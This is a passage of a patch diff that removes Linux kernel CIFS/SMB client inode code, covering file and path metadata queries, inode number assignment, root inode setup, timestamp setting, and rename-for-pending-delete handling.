+-		fattr->cf_dtype = DT_LNK;
+-	} else if (fattr->cf_cifsattrs & ATTR_DIRECTORY) {
+-		fattr->cf_mode = S_IFDIR | cifs_sb->ctx->dir_mode;
+-		fattr->cf_dtype = DT_DIR;
+-		/*
+-		 * Server can return wrong NumberOfLinks value for directories
+-		 * when Unix extensions are disabled - fake it.
+-		 */
+-		if (!tcon->unix_ext)
+-			fattr->cf_flags |= CIFS_FATTR_UNKNOWN_NLINK;
+-	} else {
+-		fattr->cf_mode = S_IFREG | cifs_sb->ctx->file_mode;
+-		fattr->cf_dtype = DT_REG;
+-
+-		/* clear write bits if ATTR_READONLY is set */
+-		if (fattr->cf_cifsattrs & ATTR_READONLY)
+-			fattr->cf_mode &= ~(S_IWUGO);
+-
+-		/*
+-		 * Don't accept zero nlink from non-unix servers unless
+-		 * delete is pending.  Instead mark it as unknown.
+-		 */
+-		if ((fattr->cf_nlink < 1) && !tcon->unix_ext &&
+-		    !info->DeletePending) {
+-			cifs_dbg(VFS, "bogus file nlink value %u\n",
+-				 fattr->cf_nlink);
+-			fattr->cf_flags |= CIFS_FATTR_UNKNOWN_NLINK;
+-		}
+-	}
+-
+-	if (S_ISLNK(fattr->cf_mode)) {
+-		fattr->cf_symlink_target = data->symlink_target;
+-		data->symlink_target = NULL;
+-	}
+-
+-	fattr->cf_uid = cifs_sb->ctx->linux_uid;
+-	fattr->cf_gid = cifs_sb->ctx->linux_gid;
+-}
+-
+-static int
+-cifs_get_file_info(struct file *filp)
+-{
+-	int rc;
+-	unsigned int xid;
+-	struct cifs_open_info_data data = {};
+-	struct cifs_fattr fattr;
+-	struct inode *inode = file_inode(filp);
+-	struct cifsFileInfo *cfile = filp->private_data;
+-	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-	bool symlink = false;
+-	u32 tag = 0;
+-
+-	if (!server->ops->query_file_info)
+-		return -ENOSYS;
+-
+-	xid = get_xid();
+-	rc = server->ops->query_file_info(xid, tcon, cfile, &data);
+-	switch (rc) {
+-	case 0:
+-		/* TODO: add support to query reparse tag */
+-		if (data.symlink_target) {
+-			symlink = true;
+-			tag = IO_REPARSE_TAG_SYMLINK;
+-		}
+-		cifs_open_info_to_fattr(&fattr, &data, inode->i_sb, false, symlink, tag);
+-		break;
+-	case -EREMOTE:
+-		cifs_create_dfs_fattr(&fattr, inode->i_sb);
+-		rc = 0;
+-		break;
+-	case -EOPNOTSUPP:
+-	case -EINVAL:
+-		/*
+-		 * FIXME: legacy server -- fall back to path-based call?
+-		 * for now, just skip revalidating and mark inode for
+-		 * immediate reval.
+-		 */
+-		rc = 0;
+-		CIFS_I(inode)->time = 0;
+-		goto cgfi_exit;
+-	default:
+-		goto cgfi_exit;
+-	}
+-
+-	/*
+-	 * don't bother with SFU junk here -- just mark inode as needing
+-	 * revalidation.
+-	 */
+-	fattr.cf_uniqueid = CIFS_I(inode)->uniqueid;
+-	fattr.cf_flags |= CIFS_FATTR_NEED_REVAL;
+-	/* if filetype is different, return error */
+-	rc = cifs_fattr_to_inode(inode, &fattr);
+-cgfi_exit:
+-	cifs_free_open_info(&data);
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-/* Simple function to return a 64 bit hash of string.  Rarely called */
+-static __u64 simple_hashstr(const char *str)
+-{
+-	const __u64 hash_mult =  1125899906842597ULL; /* a big enough prime */
+-	__u64 hash = 0;
+-
+-	while (*str)
+-		hash = (hash + (__u64) *str++) * hash_mult;
+-
+-	return hash;
+-}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-/**
+- * cifs_backup_query_path_info - SMB1 fallback code to get ino
+- *
+- * Fallback code to get file metadata when we don't have access to
+- * full_path (EACCES) and have backup creds.
+- *
+- * @xid:	transaction id used to identify original request in logs
+- * @tcon:	information about the server share we have mounted
+- * @sb:	the superblock stores info such as disk space available
+- * @full_path:	name of the file we are getting the metadata for
+- * @resp_buf:	will be set to cifs resp buf and needs to be freed with
+- * 		cifs_buf_release() when done with @data
+- * @data:	will be set to search info result buffer
+- */
+-static int
+-cifs_backup_query_path_info(int xid,
+-			    struct cifs_tcon *tcon,
+-			    struct super_block *sb,
+-			    const char *full_path,
+-			    void **resp_buf,
+-			    FILE_ALL_INFO **data)
+-{
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
+-	struct cifs_search_info info = {0};
+-	u16 flags;
+-	int rc;
+-
+-	*resp_buf = NULL;
+-	info.endOfSearch = false;
+-	if (tcon->unix_ext)
+-		info.info_level = SMB_FIND_FILE_UNIX;
+-	else if ((tcon->ses->capabilities &
+-		  tcon->ses->server->vals->cap_nt_find) == 0)
+-		info.info_level = SMB_FIND_FILE_INFO_STANDARD;
+-	else if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM)
+-		info.info_level = SMB_FIND_FILE_ID_FULL_DIR_INFO;
+-	else /* no srvino useful for fallback to some netapp */
+-		info.info_level = SMB_FIND_FILE_DIRECTORY_INFO;
+-
+-	flags = CIFS_SEARCH_CLOSE_ALWAYS |
+-		CIFS_SEARCH_CLOSE_AT_END |
+-		CIFS_SEARCH_BACKUP_SEARCH;
+-
+-	rc = CIFSFindFirst(xid, tcon, full_path,
+-			   cifs_sb, NULL, flags, &info, false);
+-	if (rc)
+-		return rc;
+-
+-	*resp_buf = (void *)info.ntwrk_buf_start;
+-	*data = (FILE_ALL_INFO *)info.srch_entries_start;
+-	return 0;
+-}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-static void cifs_set_fattr_ino(int xid, struct cifs_tcon *tcon, struct super_block *sb,
+-			       struct inode **inode, const char *full_path,
+-			       struct cifs_open_info_data *data, struct cifs_fattr *fattr)
+-{
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-	int rc;
+-
+-	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM)) {
+-		if (*inode)
+-			fattr->cf_uniqueid = CIFS_I(*inode)->uniqueid;
+-		else
+-			fattr->cf_uniqueid = iunique(sb, ROOT_I);
+-		return;
+-	}
+-
+-	/*
+-	 * If we have an inode pass a NULL tcon to ensure we don't
+-	 * make a round trip to the server. This only works for SMB2+.
+-	 */
+-	rc = server->ops->get_srv_inum(xid, *inode ? NULL : tcon, cifs_sb, full_path,
+-				       &fattr->cf_uniqueid, data);
+-	if (rc) {
+-		/*
+-		 * If that fails reuse existing ino or generate one
+-		 * and disable server ones
+-		 */
+-		if (*inode)
+-			fattr->cf_uniqueid = CIFS_I(*inode)->uniqueid;
+-		else {
+-			fattr->cf_uniqueid = iunique(sb, ROOT_I);
+-			cifs_autodisable_serverino(cifs_sb);
+-		}
+-		return;
+-	}
+-
+-	/* If no errors, check for zero root inode (invalid) */
+-	if (fattr->cf_uniqueid == 0 && strlen(full_path) == 0) {
+-		cifs_dbg(FYI, "Invalid (0) inodenum\n");
+-		if (*inode) {
+-			/* reuse */
+-			fattr->cf_uniqueid = CIFS_I(*inode)->uniqueid;
+-		} else {
+-			/* make an ino by hashing the UNC */
+-			fattr->cf_flags |= CIFS_FATTR_FAKE_ROOT_INO;
+-			fattr->cf_uniqueid = simple_hashstr(tcon->tree_name);
+-		}
+-	}
+-}
+-
+-static inline bool is_inode_cache_good(struct inode *ino)
+-{
+-	return ino && CIFS_CACHE_READ(CIFS_I(ino)) && CIFS_I(ino)->time != 0;
+-}
+-
+-int cifs_get_inode_info(struct inode **inode, const char *full_path,
+-			struct cifs_open_info_data *data, struct super_block *sb, int xid,
+-			const struct cifs_fid *fid)
+-{
+-	struct cifs_tcon *tcon;
+-	struct TCP_Server_Info *server;
+-	struct tcon_link *tlink;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
+-	bool adjust_tz = false;
+-	struct cifs_fattr fattr = {0};
+-	bool is_reparse_point = false;
+-	struct cifs_open_info_data tmp_data = {};
+-	void *smb1_backup_rsp_buf = NULL;
+-	int rc = 0;
+-	int tmprc = 0;
+-	__u32 reparse_tag = 0;
+-
+-	tlink = cifs_sb_tlink(cifs_sb);
+-	if (IS_ERR(tlink))
+-		return PTR_ERR(tlink);
+-	tcon = tlink_tcon(tlink);
+-	server = tcon->ses->server;
+-
+-	/*
+-	 * 1. Fetch file metadata if not provided (data)
+-	 */
+-
+-	if (!data) {
+-		if (is_inode_cache_good(*inode)) {
+-			cifs_dbg(FYI, "No need to revalidate cached inode sizes\n");
+-			goto out;
+-		}
+-		rc = server->ops->query_path_info(xid, tcon, cifs_sb, full_path, &tmp_data,
+-						  &adjust_tz, &is_reparse_point);
+-		data = &tmp_data;
+-	}
+-
+-	/*
+-	 * 2. Convert it to internal cifs metadata (fattr)
+-	 */
+-
+-	switch (rc) {
+-	case 0:
+-		/*
+-		 * If the file is a reparse point, it is more complicated
+-		 * since we have to check if its reparse tag matches a known
+-		 * special file type e.g. symlink or fifo or char etc.
+-		 */
+-		if (is_reparse_point && data->symlink_target) {
+-			reparse_tag = IO_REPARSE_TAG_SYMLINK;
+-		} else if ((le32_to_cpu(data->fi.Attributes) & ATTR_REPARSE) &&
+-			   server->ops->query_reparse_tag) {
+-			tmprc = server->ops->query_reparse_tag(xid, tcon, cifs_sb, full_path,
+-							    &reparse_tag);
+-			if (tmprc)
+-				cifs_dbg(FYI, "%s: query_reparse_tag: rc = %d\n", __func__, tmprc);
+-			if (server->ops->query_symlink) {
+-				tmprc = server->ops->query_symlink(xid, tcon, cifs_sb, full_path,
+-								   &data->symlink_target,
+-								   is_reparse_point);
+-				if (tmprc)
+-					cifs_dbg(FYI, "%s: query_symlink: rc = %d\n", __func__,
+-						 tmprc);
+-			}
+-		}
+-		cifs_open_info_to_fattr(&fattr, data, sb, adjust_tz, is_reparse_point, reparse_tag);
+-		break;
+-	case -EREMOTE:
+-		/* DFS link, no metadata available on this server */
+-		cifs_create_dfs_fattr(&fattr, sb);
+-		rc = 0;
+-		break;
+-	case -EACCES:
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-		/*
+-		 * perm errors, try again with backup flags if possible
+-		 *
+-		 * For SMB2 and later the backup intent flag
+-		 * is already sent if needed on open and there
+-		 * is no path based FindFirst operation to use
+-		 * to retry with
+-		 */
+-		if (backup_cred(cifs_sb) && is_smb1_server(server)) {
+-			/* for easier reading */
+-			FILE_ALL_INFO *fi;
+-			FILE_DIRECTORY_INFO *fdi;
+-			SEARCH_ID_FULL_DIR_INFO *si;
+-
+-			rc = cifs_backup_query_path_info(xid, tcon, sb,
+-							 full_path,
+-							 &smb1_backup_rsp_buf,
+-							 &fi);
+-			if (rc)
+-				goto out;
+-
+-			move_cifs_info_to_smb2(&data->fi, fi);
+-			fdi = (FILE_DIRECTORY_INFO *)fi;
+-			si = (SEARCH_ID_FULL_DIR_INFO *)fi;
+-
+-			cifs_dir_info_to_fattr(&fattr, fdi, cifs_sb);
+-			fattr.cf_uniqueid = le64_to_cpu(si->UniqueId);
+-			/* uniqueid set, skip get inum step */
+-			goto handle_mnt_opt;
+-		} else {
+-			/* nothing we can do, bail out */
+-			goto out;
+-		}
+-#else
+-		goto out;
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-		break;
+-	default:
+-		cifs_dbg(FYI, "%s: unhandled err rc %d\n", __func__, rc);
+-		goto out;
+-	}
+-
+-	/*
+-	 * 3. Get or update inode number (fattr.cf_uniqueid)
+-	 */
+-
+-	cifs_set_fattr_ino(xid, tcon, sb, inode, full_path, data, &fattr);
+-
+-	/*
+-	 * 4. Tweak fattr based on mount options
+-	 */
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-handle_mnt_opt:
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-	/* query for SFU type info if supported and needed */
+-	if (fattr.cf_cifsattrs & ATTR_SYSTEM &&
+-	    cifs_sb->mnt_cifs_flags & CIFS_MOUNT_UNX_EMUL) {
+-		tmprc = cifs_sfu_type(&fattr, full_path, cifs_sb, xid);
+-		if (tmprc)
+-			cifs_dbg(FYI, "cifs_sfu_type failed: %d\n", tmprc);
+-	}
+-
+-	/* fill in 0777 bits from ACL */
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MODE_FROM_SID) {
+-		rc = cifs_acl_to_fattr(cifs_sb, &fattr, *inode, true,
+-				       full_path, fid);
+-		if (rc == -EREMOTE)
+-			rc = 0;
+-		if (rc) {
+-			cifs_dbg(FYI, "%s: Get mode from SID failed. rc=%d\n",
+-				 __func__, rc);
+-			goto out;
+-		}
+-	} else if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_CIFS_ACL) {
+-		rc = cifs_acl_to_fattr(cifs_sb, &fattr, *inode, false,
+-				       full_path, fid);
+-		if (rc == -EREMOTE)
+-			rc = 0;
+-		if (rc) {
+-			cifs_dbg(FYI, "%s: Getting ACL failed with error: %d\n",
+-				 __func__, rc);
+-			goto out;
+-		}
+-	}
+-
+-	/* fill in remaining high mode bits e.g. SUID, VTX */
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_UNX_EMUL)
+-		cifs_sfu_mode(&fattr, full_path, cifs_sb, xid);
+-
+-	/* check for Minshall+French symlinks */
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MF_SYMLINKS) {
+-		tmprc = check_mf_symlink(xid, tcon, cifs_sb, &fattr,
+-					 full_path);
+-		if (tmprc)
+-			cifs_dbg(FYI, "check_mf_symlink: %d\n", tmprc);
+-	}
+-
+-	/*
+-	 * 5. Update inode with final fattr data
+-	 */
+-
+-	if (!*inode) {
+-		*inode = cifs_iget(sb, &fattr);
+-		if (!*inode)
+-			rc = -ENOMEM;
+-	} else {
+-		/* we already have inode, update it */
+-
+-		/* if uniqueid is different, return error */
+-		if (unlikely(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM &&
+-		    CIFS_I(*inode)->uniqueid != fattr.cf_uniqueid)) {
+-			CIFS_I(*inode)->time = 0; /* force reval */
+-			rc = -ESTALE;
+-			goto out;
+-		}
+-		/* if filetype is different, return error */
+-		rc = cifs_fattr_to_inode(*inode, &fattr);
+-	}
+-out:
+-	cifs_buf_release(smb1_backup_rsp_buf);
+-	cifs_put_tlink(tlink);
+-	cifs_free_open_info(&tmp_data);
+-	kfree(fattr.cf_symlink_target);
+-	return rc;
+-}
+-
+-int
+-smb311_posix_get_inode_info(struct inode **inode,
+-		    const char *full_path,
+-		    struct super_block *sb, unsigned int xid)
+-{
+-	struct cifs_tcon *tcon;
+-	struct tcon_link *tlink;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
+-	bool adjust_tz = false;
+-	struct cifs_fattr fattr = {0};
+-	bool symlink = false;
+-	struct cifs_open_info_data data = {};
+-	int rc = 0;
+-	int tmprc = 0;
+-
+-	tlink = cifs_sb_tlink(cifs_sb);
+-	if (IS_ERR(tlink))
+-		return PTR_ERR(tlink);
+-	tcon = tlink_tcon(tlink);
+-
+-	/*
+-	 * 1. Fetch file metadata
+-	 */
+-
+-	if (is_inode_cache_good(*inode)) {
+-		cifs_dbg(FYI, "No need to revalidate cached inode sizes\n");
+-		goto out;
+-	}
+-
+-	rc = smb311_posix_query_path_info(xid, tcon, cifs_sb, full_path, &data, &adjust_tz,
+-					  &symlink);
+-
+-	/*
+-	 * 2. Convert it to internal cifs metadata (fattr)
+-	 */
+-
+-	switch (rc) {
+-	case 0:
+-		smb311_posix_info_to_fattr(&fattr, &data, sb, adjust_tz, symlink);
+-		break;
+-	case -EREMOTE:
+-		/* DFS link, no metadata available on this server */
+-		cifs_create_dfs_fattr(&fattr, sb);
+-		rc = 0;
+-		break;
+-	case -EACCES:
+-		/*
+-		 * For SMB2 and later the backup intent flag
+-		 * is already sent if needed on open and there
+-		 * is no path based FindFirst operation to use
+-		 * to retry with so nothing we can do, bail out
+-		 */
+-		goto out;
+-	default:
+-		cifs_dbg(FYI, "%s: unhandled err rc %d\n", __func__, rc);
+-		goto out;
+-	}
+-
+-
+-	/*
+-	 * 3. Tweak fattr based on mount options
+-	 */
+-
+-	/* check for Minshall+French symlinks */
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MF_SYMLINKS) {
+-		tmprc = check_mf_symlink(xid, tcon, cifs_sb, &fattr,
+-					 full_path);
+-		if (tmprc)
+-			cifs_dbg(FYI, "check_mf_symlink: %d\n", tmprc);
+-	}
+-
+-	/*
+-	 * 4. Update inode with final fattr data
+-	 */
+-
+-	if (!*inode) {
+-		*inode = cifs_iget(sb, &fattr);
+-		if (!*inode)
+-			rc = -ENOMEM;
+-	} else {
+-		/* we already have inode, update it */
+-
+-		/* if uniqueid is different, return error */
+-		if (unlikely(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM &&
+-		    CIFS_I(*inode)->uniqueid != fattr.cf_uniqueid)) {
+-			CIFS_I(*inode)->time = 0; /* force reval */
+-			rc = -ESTALE;
+-			goto out;
+-		}
+-
+-		/* if filetype is different, return error */
+-		rc = cifs_fattr_to_inode(*inode, &fattr);
+-	}
+-out:
+-	cifs_put_tlink(tlink);
+-	cifs_free_open_info(&data);
+-	kfree(fattr.cf_symlink_target);
+-	return rc;
+-}
+-
+-
+-static const struct inode_operations cifs_ipc_inode_ops = {
+-	.lookup = cifs_lookup,
+-};
+-
+-static int
+-cifs_find_inode(struct inode *inode, void *opaque)
+-{
+-	struct cifs_fattr *fattr = opaque;
+-
+-	/* don't match inode with different uniqueid */
+-	if (CIFS_I(inode)->uniqueid != fattr->cf_uniqueid)
+-		return 0;
+-
+-	/* use createtime like an i_generation field */
+-	if (CIFS_I(inode)->createtime != fattr->cf_createtime)
+-		return 0;
+-
+-	/* don't match inode of different type */
+-	if (inode_wrong_type(inode, fattr->cf_mode))
+-		return 0;
+-
+-	/* if it's not a directory or has no dentries, then flag it */
+-	if (S_ISDIR(inode->i_mode) && !hlist_empty(&inode->i_dentry))
+-		fattr->cf_flags |= CIFS_FATTR_INO_COLLISION;
+-
+-	return 1;
+-}
+-
+-static int
+-cifs_init_inode(struct inode *inode, void *opaque)
+-{
+-	struct cifs_fattr *fattr = opaque;
+-
+-	CIFS_I(inode)->uniqueid = fattr->cf_uniqueid;
+-	CIFS_I(inode)->createtime = fattr->cf_createtime;
+-	return 0;
+-}
+-
+-/*
+- * walk dentry list for an inode and report whether it has aliases that
+- * are hashed. We use this to determine if a directory inode can actually
+- * be used.
+- */
+-static bool
+-inode_has_hashed_dentries(struct inode *inode)
+-{
+-	struct dentry *dentry;
+-
+-	spin_lock(&inode->i_lock);
+-	hlist_for_each_entry(dentry, &inode->i_dentry, d_u.d_alias) {
+-		if (!d_unhashed(dentry) || IS_ROOT(dentry)) {
+-			spin_unlock(&inode->i_lock);
+-			return true;
+-		}
+-	}
+-	spin_unlock(&inode->i_lock);
+-	return false;
+-}
+-
+-/* Given fattrs, get a corresponding inode */
+-struct inode *
+-cifs_iget(struct super_block *sb, struct cifs_fattr *fattr)
+-{
+-	unsigned long hash;
+-	struct inode *inode;
+-
+-retry_iget5_locked:
+-	cifs_dbg(FYI, "looking for uniqueid=%llu\n", fattr->cf_uniqueid);
+-
+-	/* hash down to 32-bits on 32-bit arch */
+-	hash = cifs_uniqueid_to_ino_t(fattr->cf_uniqueid);
+-
+-	inode = iget5_locked(sb, hash, cifs_find_inode, cifs_init_inode, fattr);
+-	if (inode) {
+-		/* was there a potentially problematic inode collision? */
+-		if (fattr->cf_flags & CIFS_FATTR_INO_COLLISION) {
+-			fattr->cf_flags &= ~CIFS_FATTR_INO_COLLISION;
+-
+-			if (inode_has_hashed_dentries(inode)) {
+-				cifs_autodisable_serverino(CIFS_SB(sb));
+-				iput(inode);
+-				fattr->cf_uniqueid = iunique(sb, ROOT_I);
+-				goto retry_iget5_locked;
+-			}
+-		}
+-
+-		/* can't fail - see cifs_find_inode() */
+-		cifs_fattr_to_inode(inode, fattr);
+-		if (sb->s_flags & SB_NOATIME)
+-			inode->i_flags |= S_NOATIME | S_NOCMTIME;
+-		if (inode->i_state & I_NEW) {
+-			inode->i_ino = hash;
+-			cifs_fscache_get_inode_cookie(inode);
+-			unlock_new_inode(inode);
+-		}
+-	}
+-
+-	return inode;
+-}
+-
+-/* gets root inode */
+-struct inode *cifs_root_iget(struct super_block *sb)
+-{
+-	unsigned int xid;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
+-	struct inode *inode = NULL;
+-	long rc;
+-	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
+-	char *path = NULL;
+-	int len;
+-
+-	if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_USE_PREFIX_PATH)
+-	    && cifs_sb->prepath) {
+-		len = strlen(cifs_sb->prepath);
+-		path = kzalloc(len + 2 /* leading sep + null */, GFP_KERNEL);
+-		if (path == NULL)
+-			return ERR_PTR(-ENOMEM);
+-		path[0] = '/';
+-		memcpy(path+1, cifs_sb->prepath, len);
+-	} else {
+-		path = kstrdup("", GFP_KERNEL);
+-		if (path == NULL)
+-			return ERR_PTR(-ENOMEM);
+-	}
+-
+-	xid = get_xid();
+-	if (tcon->unix_ext) {
+-		rc = cifs_get_inode_info_unix(&inode, path, sb, xid);
+-		/* some servers mistakenly claim POSIX support */
+-		if (rc != -EOPNOTSUPP)
+-			goto iget_no_retry;
+-		cifs_dbg(VFS, "server does not support POSIX extensions\n");
+-		tcon->unix_ext = false;
+-	}
+-
+-	convert_delimiter(path, CIFS_DIR_SEP(cifs_sb));
+-	if (tcon->posix_extensions)
+-		rc = smb311_posix_get_inode_info(&inode, path, sb, xid);
+-	else
+-		rc = cifs_get_inode_info(&inode, path, NULL, sb, xid, NULL);
+-
+-iget_no_retry:
+-	if (!inode) {
+-		inode = ERR_PTR(rc);
+-		goto out;
+-	}
+-
+-	if (rc && tcon->pipe) {
+-		cifs_dbg(FYI, "ipc connection - fake read inode\n");
+-		spin_lock(&inode->i_lock);
+-		inode->i_mode |= S_IFDIR;
+-		set_nlink(inode, 2);
+-		inode->i_op = &cifs_ipc_inode_ops;
+-		inode->i_fop = &simple_dir_operations;
+-		inode->i_uid = cifs_sb->ctx->linux_uid;
+-		inode->i_gid = cifs_sb->ctx->linux_gid;
+-		spin_unlock(&inode->i_lock);
+-	} else if (rc) {
+-		iget_failed(inode);
+-		inode = ERR_PTR(rc);
+-	}
+-
+-out:
+-	kfree(path);
+-	free_xid(xid);
+-	return inode;
+-}
+-
+-int
+-cifs_set_file_info(struct inode *inode, struct iattr *attrs, unsigned int xid,
+-		   const char *full_path, __u32 dosattr)
+-{
+-	bool set_time = false;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct TCP_Server_Info *server;
+-	FILE_BASIC_INFO	info_buf;
+-
+-	if (attrs == NULL)
+-		return -EINVAL;
+-
+-	server = cifs_sb_master_tcon(cifs_sb)->ses->server;
+-	if (!server->ops->set_file_info)
+-		return -ENOSYS;
+-
+-	info_buf.Pad = 0;
+-
+-	if (attrs->ia_valid & ATTR_ATIME) {
+-		set_time = true;
+-		info_buf.LastAccessTime =
+-			cpu_to_le64(cifs_UnixTimeToNT(attrs->ia_atime));
+-	} else
+-		info_buf.LastAccessTime = 0;
+-
+-	if (attrs->ia_valid & ATTR_MTIME) {
+-		set_time = true;
+-		info_buf.LastWriteTime =
+-		    cpu_to_le64(cifs_UnixTimeToNT(attrs->ia_mtime));
+-	} else
+-		info_buf.LastWriteTime = 0;
+-
+-	/*
+-	 * Samba throws this field away, but windows may actually use it.
+-	 * Do not set ctime unless other time stamps are changed explicitly
+-	 * (i.e. by utimes()) since we would then have a mix of client and
+-	 * server times.
+-	 */
+-	if (set_time && (attrs->ia_valid & ATTR_CTIME)) {
+-		cifs_dbg(FYI, "CIFS - CTIME changed\n");
+-		info_buf.ChangeTime =
+-		    cpu_to_le64(cifs_UnixTimeToNT(attrs->ia_ctime));
+-	} else
+-		info_buf.ChangeTime = 0;
+-
+-	info_buf.CreationTime = 0;	/* don't change */
+-	info_buf.Attributes = cpu_to_le32(dosattr);
+-
+-	return server->ops->set_file_info(inode, full_path, &info_buf, xid);
+-}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-/*
+- * Open the given file (if it isn't already), set the DELETE_ON_CLOSE bit
+- * and rename it to a random name that hopefully won't conflict with
+- * anything else.
+- */
+-int
+-cifs_rename_pending_delete(const char *full_path, struct dentry *dentry,
+-			   const unsigned int xid)
+-{
+-	int oplock = 0;
+-	int rc;
+-	struct cifs_fid fid;
+-	struct cifs_open_parms oparms;
+-	struct inode *inode = d_inode(dentry);
+-	struct cifsInodeInfo *cifsInode = CIFS_I(inode);
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct tcon_link *tlink;
+-	struct cifs_tcon *tcon;
+-	__u32 dosattr, origattr;
+-	FILE_BASIC_INFO *info_buf = NULL;
+-
+-	tlink = cifs_sb_tlink(cifs_sb);
+-	if (IS_ERR(tlink))
+-		return PTR_ERR(tlink);
+-	tcon = tlink_tcon(tlink);
+-
+-	/*
+-	 * We cannot rename the file if the server doesn't support
+-	 * CAP_INFOLEVEL_PASSTHRU
+-	 */
+-	if (!(tcon->ses->capabilities & CAP_INFOLEVEL_PASSTHRU)) {
+-		rc = -EBUSY;
+-		goto out;
+-	}
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.cifs_sb = cifs_sb,
+-		.desired_access = DELETE | FILE_WRITE_ATTRIBUTES,
+-		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
+-		.disposition = FILE_OPEN,
+-		.path = full_path,
+-		.fid = &fid,
+-	};
+-
+-	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+-	if (rc != 0)
+-		goto out;
+-
+-	origattr = cifsInode->cifsAttrs;
+-	if (origattr == 0)
+-		origattr |= ATTR_NORMAL;
+-
+-	dosattr = origattr & ~ATTR_READONLY;
+-	if (dosattr == 0)
+-		dosattr |= ATTR_NORMAL;
+-	dosattr |= ATTR_HIDDEN;
+-
+-	/* set ATTR_HIDDEN and clear ATTR_READONLY, but only if needed */
+-	if (dosattr != origattr) {
+-		info_buf = kzalloc(sizeof(*info_buf), GFP_KERNEL);
+-		if (info_buf == NULL) {
+-			rc = -ENOMEM;
+-			goto out_close;
+-		}
+-		info_buf->Attributes = cpu_to_le32(dosattr);
+-		rc = CIFSSMBSetFileInfo(xid, tcon, info_buf, fid.netfid,
+-					current->tgid);
+-		/* although we would like to mark the file hidden
+- 		   if that fails we will still try to rename it */
+-		if (!rc)
+-			cifsInode->cifsAttrs = dosattr;
+-		else
+-			dosattr = origattr; /* since not able to change them */
+-	}
+-
+-	/* rename the file */
+-	rc = CIFSSMBRenameOpenFile(xid, tcon, fid.netfid, NULL,
+-				   cifs_sb->local_nls,
+-				   cifs_remap(cifs_sb));
+-	if (rc != 0) {
+-		rc = -EBUSY;
+-		goto undo_setattr;
+-	}
+-
+-	/* try to set DELETE_ON_CLOSE */
+-	if (!test_bit(CIFS_INO_DELETE_PENDING, &cifsInode->flags)) {
+-		rc = CIFSSMBSetFileDisposition(xid, tcon, true, fid.netfid,
+-					       current->tgid);
+-		/*
+-		 * some samba versions return -ENOENT when we try to set the
+-		 * file disposition here. Likely a samba bug, but work around
+-		 * it for now. This means that some cifsXXX files may hang
+-		 * around after they shouldn't.
+-		 *
+-		 * BB: remove this hack after more servers have the fix
+-		 */
+-		if (rc == -ENOENT)
+-			rc = 0;
+-		else if (rc != 0) {
+-			rc = -EBUSY;
+-			goto undo_rename;
+-		}
+-		set_bit(CIFS_INO_DELETE_PENDING, &cifsInode->flags);
+-	}
+-
+-out_close:
+-	CIFSSMBClose(xid, tcon, fid.netfid);
+-out:
+-	kfree(info_buf);
+-	cifs_put_tlink(tlink);
+-	return rc;
+-
+-	/*
+-	 * reset everything back to the original state. Don't bother
+-	 * dealing with errors here since we can't do anything about
+-	 * them anyway.
+-	 */
+-undo_rename:
+-	CIFSSMBRenameOpenFile(xid, tcon, fid.netfid, dentry->d_name.name,
+-				cifs_sb->local_nls, cifs_remap(cifs_sb));
+-undo_setattr:
+-	if (dosattr != origattr) {
+-		info_buf->Attributes = cpu_to_le32(origattr);
+-		if (!CIFSSMBSetFileInfo(xid, tcon, info_buf, fid.netfid,
+-					current->tgid))
+-			cifsInode->cifsAttrs = origattr;
+-	}
+-
+-	goto out_close;
+-}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-/* copied from fs/nfs/dir.c with small changes */
+-static void
+-cifs_drop_nlink(struct inode *inode)
+-{
+-	spin_lock(&inode->i_lock);
+-	if (inode->i_nlink > 0)
+-		drop_nlink(inode);
+-	spin_unlock(&inode->i_lock);
+-}
+-
+-/*
+- * If d_inode(dentry) is null (usually meaning the cached dentry
+- * is a negative dentry) then we would attempt a standard SMB delete, but
+- * if that fails we can not attempt the fall back mechanisms on EACCES
+- * but will return the EACCES to the caller. Note that the VFS does not call
+- * unlink on negative dentries currently.
+- */
+-int cifs_unlink(struct inode *dir, struct dentry *dentry)
+-{
+-	int rc = 0;
+-	unsigned int xid;
+-	const char *full_path;
+-	void *page;
+-	struct inode *inode = d_inode(dentry);
+-	struct cifsInodeInfo *cifs_inode;
+-	struct super_block *sb = dir->i_sb;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
+-	struct tcon_link *tlink;
+-	struct cifs_tcon *tcon;
+-	struct TCP_Server_Info *server;
+-	struct iattr *attrs = NULL;
+-	__u32 dosattr = 0, origattr = 0;
+-
